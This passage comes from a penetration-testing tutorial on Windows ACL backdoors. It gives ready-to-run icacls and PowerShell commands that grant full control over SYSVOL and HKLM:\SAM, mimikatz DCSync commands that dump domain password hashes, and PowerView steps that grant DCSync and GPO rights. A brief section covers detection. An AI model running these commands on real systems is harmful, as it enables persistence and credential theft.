defensive perspective, if a system is compromised, finding and removing ACL backdoors left by attackers also requires a certain understanding of ACL.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>ACL-related concepts\u003C\u002Fli>\u003Cli>Viewing ACL\u003C\u002Fli>\u003Cli>ACL exploitation (files, registry, and domain environments)\u003C\u002Fli>\u003Cli>ACL detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 ACL-related concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FSecAuthZ\u002Faccess-control-lists\u003C\u002Fp>\u003Ch4>ACL:\u003C\u002Fh4>\u003Cp>Access Control List, a list used to represent user (group) permissions, including DACL and SACL\u003C\u002Fp>\u003Ch4>ACE:\u003C\u002Fh4>\u003Cp>Access Control Entry, an element within an ACL\u003C\u002Fp>\u003Ch4>DACL:\u003C\u002Fh4>\u003Cp>Discretionary Access Control List, a list used to represent permissions for a security object\u003C\u002Fp>\u003Ch4>SACL:\u003C\u002Fh4>\u003Cp>System Access Control List, used to log access to a security object\u003C\u002Fp>\u003Ch4>Intuitive understanding:\u003C\u002Fh4>\u003Cp>ACLs are used in the Windows access control model, such as permissions for files and registries, to indicate which users (groups) have operational permissions\u003C\u002Fp>\u003Cp>For example, when accessing a file, the system will make the following judgments:\u003C\u002Fp>\u003Cul>\u003Cli>If there is no DACL, the system will allow access\u003C\u002Fli>\u003Cli>If a DACL exists but has no ACEs, the system will deny all access\u003C\u002Fli>\u003Cli>If a DACL exists and ACEs are present, each ACE specifies either allow or deny permissions.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Example demonstration\u003C\u002Fh3>\u003Cp>For the folder C:\\Windows\\SYSVOL\\sysvol\\test.com, view folder properties\u003C\u002Fp>\u003Cp>By default, there are five DACLs, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019792499_0_b63f250865-1.jpeg\">\u003C\u002Fp>\u003Cp>Select one DACL, which contains multiple ACEs, indicating the permissions granted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019800895_1_a9db3ccfbf-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 ACLs in files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (icacls):\u003C\u002Fh3>\u003Ch4>1. View the ACL of a specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019814348_2_56d0ddb9c7-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Back up the ACL of a specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fsave AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Restore ACL for specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\ \u002Frestore AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When restoring, the path needs to be set to the parent directory\u003C\u002Fp>\u003Ch4>4. Add full access permissions for user test1 to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fgrant test1:(OI)(CI)(F) \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(OI) stands for Object Inherit\u003C\u002Fp>\u003Cp>(CI) stands for Container Inherit\u003C\u002Fp>\u003Cp>(F) stands for Full Access\u003C\u002Fp>\u003Ch4>5. Remove full access permissions for user test1 from specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fremove test1 \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>For example, C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'| Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Add full access permissions for user test1 to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Remove user test1's full access permissions to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to the specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    $file.fullname\u003Cbr>    Add-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove user test1's full access permissions to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    Remove-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. Local Privilege Escalation Backdoor\u003C\u002Fh4>\u003Cp>After obtaining administrator privileges on a Windows system, modify the ACL of system directories to grant full access to regular users, creating a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Subsequently, elevate from a regular user to administrator privileges through various methods such as DLL hijacking or file replacement.\u003C\u002Fp>\u003Ch4>2. Modification of GPO in Domain Environment\u003C\u002Fh4>\u003Cp>Modify the ACL of the domain shared folder \\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\ to grant full access to regular users.\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Subsequently, use the privileges of a regular domain user to modify the domain's GPO, alter scheduled tasks within the GPO, and achieve remote execution of scheduled tasks.\u003C\u002Fp>\u003Cp>For related methods, refer to the previous article 'Domain Penetration – Remote Execution via Scheduled Tasks in GPO'.\u003C\u002Fp>\u003Ch4>3. Domain ordinary user reads all user hashes within the domain\u003C\u002Fh4>\u003Cp>Create file sharing for ntds.dit, add ACL\u003C\u002Fp>\u003Cp>Subsequently, domain ordinary users can access the domain controller's ntds.dit file to read all user hashes within the domain\u003C\u002Fp>\u003Ch2>0x04 ACL in the Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>e.g., HKEY_LOCAL_MACHINE\\SAM\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'HKLM:\\SAM' | Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019825851_3_5509259ae4-1.jpeg\">\u003C\u002Fp>\u003Cp>Obtain specific content of the Access item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl -Path 'HKLM:\\SAM'\u003Cbr>$acl.Access\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019837440_4_cd1dbf9e34-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Grant user test1 full access to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\" indicates that subkeys inherit permissions from the current registry key\u003C\u002Fp>\u003Cp>Modifying the ACL of registry key HKLM:\\SAM requires Administrator privileges\u003C\u002Fp>\u003Cp>Modifying the ACL of the registry key HKLM:\\SAM\\SAM requires System privileges\u003C\u002Fp>\u003Ch4>3. Remove the full access permission of user test1 to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.RemoveAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation approach:\u003C\u002Fh3>\u003Ch4>1. Local privilege escalation backdoor\u003C\u002Fh4>\u003Cp>Modify the registry keys HKLM:\\SAM and HKLM:\\SYSTEM to add full access permissions for ordinary users\u003C\u002Fp>\u003Cp>Ordinary users can obtain the hashes of all local users through registry entries, thereby gaining administrator privileges\u003C\u002Fp>\u003Ch4>3. Local Auto-start Backdoor\u003C\u002Fh4>\u003Cp>Modify registry locations to add startup items or hijack entries\u003C\u002Fp>\u003Ch2>0x05 ACL in Domain Environment\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Implemented through Active Directory Service Interfaces (ADSI)\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fcontrolling-access-to-objects-in-active-directory-domain-services\u003C\u002Fp>\u003Cp>Reference for calling ADSI with PowerShell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002FForums\u002Fwindowsserver\u002Fen-US\u002Fdf3bfd33-c070-4a9c-be98-c4da6e591a0a\u002Fforum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerView has already implemented this part, so this section directly references the functionality in PowerView\u003C\u002Fp>\u003Cp>Code repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ch4>1. Obtain all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObject -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Obtain the ACLs of all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObjectAcl -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Obtain the ACL of a specified user\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainUser test1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. DCSync Backdoor\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is learned from: https:\u002F\u002Fwww.specterops.io\u002Fassets\u002Fresources\u002Fan_ace_up_the_sleeve.pdf\u003C\u002Fp>\u003Cp>DCSync is a feature of mimikatz that can simulate a domain controller and export account password hashes from the domain controller\u003C\u002Fp>\u003Cp>If we obtain domain administrator privileges on a host within the domain, we can use the following command to directly export the hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, only Domain Controllers and Enterprise Domain Admins have the permissions to use DCSync.\u003C\u002Fp>\u003Cp>However, we can add ACLs to DS-Replication-GetChanges (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), enabling ordinary users to invoke DCSync and export the hashes of all users in the domain.\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>The command to add the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, on a host within the domain where the test1 user is logged in, we can use the DCSync feature of mimikatz.\u003C\u002Fp>\u003Cp>The command to remove the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. GPO Backdoor\u003C\u002Fh4>\u003Cp>(1) View the GPOs in the current domain\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module GroupPolicy\u003Cbr>Get-GPO -All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below, TestGPO is one I added myself in the test environment, while Default Domain Policy and Default Domain Controllers Policy are GPOs that exist by default in the domain environment\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019858190_5_62de6f01db-1.jpeg\">\u003C\u002Fp>\u003Cp>(2) Add full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Remove full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Subsequent operations can be performed on GPOs to add scheduled tasks, enabling remote execution of scheduled tasks. For specific methods, refer to the previous article 'Domain Penetration - Utilizing Scheduled Tasks in GPOs for Remote Execution'.\u003C\u002Fp>\u003Ch2>0x06 ACL Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Files and Registry\u003C\u002Fh4>\u003Cp>Open-source tools such as WindowsDACLEnumProject can be utilized:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnccgroup\u002FWindowsDACLEnumProject\u003C\u002Fp>\u003Cp>Capable of listing risky ACLs.\u003C\u002Fp>\u003Ch4>3. Domain Environment\u003C\u002Fh4>\u003Cp>Advanced security audit policies need to be enabled. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fcanitpro\u002F2017\u002F03\u002F29\u002Fstep-by-step-enabling-advanced-security-audit-policy-via-ds-access\u002F\u003C\u002Fp>\u003Cp>After enabling the policy, Event ID 5136 will record ACL modifications in the domain environment. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.ultimatewindowssecurity.com\u002Fsecuritylog\u002Fencyclopedia\u002Fevent.aspx?eventid=5136\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces techniques for exploiting ACLs in Windows systems for backdoor purposes in file systems, registry, and domain environments, along with suggestions for detecting such backdoors.\u003C\u002Fp>\u003Cp>I have learned a lot about ACLs in domain environments from PowerView and would like to thank the author for open-sourcing it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1547,"Onedaysec",8,"published","2026-02-02T08:19:47.662Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Windows ACL Penetration Testing: Access Control List Exploitation","Windows ACL, Access Control List, penetration testing, privilege escalation, backdoor exploitation, DACL, SACL, icacls, PowerShell ACL",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],188,187,185,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.832Z","2026-07-23T16:01:09.294Z","draft","2026-07-23T16:04:22.264Z"]